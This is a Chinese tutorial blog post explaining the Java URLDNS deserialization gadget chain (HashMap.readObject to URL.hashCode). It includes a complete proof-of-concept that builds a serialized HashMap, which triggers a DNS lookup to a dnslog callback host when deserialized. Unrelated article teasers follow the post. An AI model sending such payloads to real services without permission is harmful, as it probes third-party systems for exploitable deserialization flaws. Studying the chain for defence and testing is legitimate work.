java 反序列化 URLDNS 链

news/2025/1/15 19:35:15/文章来源:https://www.cnblogs.com/meraklbz/p/18673639

常用于探测反序列化漏洞是否存在的一条链,之前调过cc6,这条应该比较简单,自己随便调调就行.

URL

直接来看hashCode方法

public synchronized int hashCode() {if (hashCode != -1)return hashCode;hashCode = handler.hashCode(this);return hashCode;}

可以看到通过handler.hashCode(this);这句将自身传入实质是一个对地址的访问过程.我们来看一个例子.

public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException {URL url = new URL("http://f7wi9u.dnslog.cn");url.hashCode();}

DNSLOG成功接收到访问请求.
而我们在cc6中调过,可以通过hashmap的hash方法来触发hashCode方法,那么我们可以直接写出poc.

package org.example;import java.io.*;
import java.net.URL;
import java.util.Base64;
import java.util.HashMap;public class Main {public static void main(String[] args) throws Exception {HashMap<Object, Object> hashMap = new HashMap<>();URL url = new URL("http://1272e09cd4.ipv6.1433.eu.org.");hashMap.put(url, null);ser(hashMap);deser();}public static void ser(Object obj) throws Exception {FileOutputStream fos = new FileOutputStream("data.ser");ObjectOutputStream os = new ObjectOutputStream(fos);os.writeObject(obj);ByteArrayOutputStream baos = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(baos);oos.writeObject(obj);byte[] bytes = baos.toByteArray();System.out.println(Base64.getEncoder().encodeToString(bytes));}public static void deser() throws Exception{FileInputStream fis = new FileInputStream("data.ser");ObjectInputStream ois = new ObjectInputStream(fis);ois.readObject();}
}

也是成功打通了,总结得到gadgetchain如下

Gadget chain:
ObjectInputStream.readObject()HashMap.readObject()URL.hashCode()

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/869754.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

DDR 带宽的计算与监控

DDR 带宽（Double Data Rate Bandwidth）是指 DDR 内存在一秒内可以传输的数据量，通常以 GB/s（Gigabytes per second）为单位。它是衡量内存系统性能的重要指标，直接影响系统的数据吞吐能力。 1.如何计算 DDR 带宽计算 DDR 理论带宽的公式为： DDR主频 * 位宽 = 理论带宽其…

1.15

尽力了，之前的粗心导致现在要改很多以前的坑，明天再继续

中考英语优秀范文-热点话题-传统文化-006 Welcome to Chinese Summer Camp 欢迎参加中国夏令营

1 写作要求假定你是李华，你校今年暑假将为外国学生举办一场汉语夏令营活动（Chinese Summer Camp）。请你根据下面海报的内容，用英语给你的笔友David写一封电子邮件，介绍本次活动并邀请他参加。词数80左右。 Welcome to Chinese Summer Camp Time：July 18th—July 28th, 2…

机器人

本文来自博客园，作者：Traktorea，转载请注明原文链接：https://www.cnblogs.com/kdsmyhome/p/18673586

使用Nginx实现前端映射到公网IP后端内网不映射公网.250115

一、场景：系统移动端需要映射到公网，但是后端地址不能映射出去 qbpm.xxxx.cn 系统解析内网IP qmbpm.xxxx.cn 移动端解析公网IP 二、思路：移动端前端公网端口放出80 443端口移动端后端映射到内网后端地址qbpm.xxxx.cn:8443 三、解决方法： vim nginx.confserver {listen 8…

Qml 中实现任意角为圆角的矩形

在 Qml 中，矩形（Rectangle）是最常用的元素之一。然而，标准的矩形元素仅允许设置统一的圆角半径。在实际开发中，我们经常需要更灵活的圆角设置，例如只对某些角进行圆角处理，或者设置不同角的圆角半径。本文将介绍如何通过自定义 Qml 元素实现一个任意角可为圆角的矩形…

【附源码】JAVA在线投票系统源码+SpringBoot+VUE+前后端分离

学弟，学妹好，我是爱学习的学姐，今天带来一款优秀的项目：在线投票系统源码。本文介绍了系统功能与部署安装步骤，如果您有任何问题，也请联系学姐，偶现在是经验丰富的程序员！一. 系统演示系统测试截图系统视频演示https://githubs.xyz/show/340.mp4二. 系统概述【系统…

Python Playwright学习笔记（一）

一、简介 1.1Playwright 是什么？它是微软在 2020 年初开源的新一代自动化测试工具，其功能和 selenium 类似，都可以驱动浏览器进行各种自动化操作。 1.2、特点是什么支持当前所有的主流浏览器，包括 chrome、edge、firefox、safari；支持跨平台多语言：支持Windows、Linux、…

智能驾驶数据采集回注测评工具 - ARS

在数据驱动智能驾驶的时代背景下，开发者们总结了一条适用于智能驾驶的数据闭环开发流程，这条开发线路大致包括实车数据采集->数据存储->数据处理->数据分析->数据标注->模型训练->仿真测试->实车测试->部署发布等关键环节，通过不断开发迭代，逐步完…

2025.1.15 学习

2025.1.15 学习 api开放平台我们希望在后端使用Http请求调用接口，应该怎么做呢可以用Hutool工具库中的Http请求工具类，使用如下： public class ApiClient {public String getNameByGet(String name){HashMap<String, Object> paramMap = new HashMap<>();para…

2024龙信年终技术考核

1. 分析手机备份文件，该机主的QQ号为？（标准格式：123）看了下，备份里没有QQ，但是有微信，所以应该是微信绑定的QQ号（早期微信推广时可以用QQ直接注册登录）经过测试，对应的是这个结果为1203494553 2. 分析手机备份文件，该机主的微信号为？（标准格式：abcdefg）结果为…

Dex文件结构】ReadDex解析器实现

# APP加壳脱壳 # DEX文件结构近期学习DEX文件结构为学习APP加壳脱壳打基础，自实现了一个简易的DEX解析器加深理解。DEX文件结构整体看不复杂，深究时发现DexCLassDef结构非常复杂，编码的数据结构，嵌套和指向关系。本文作为近期学习的一个阶段总结以及知识分享，后期再完…

java 反序列化 URLDNS 链

URL

相关文章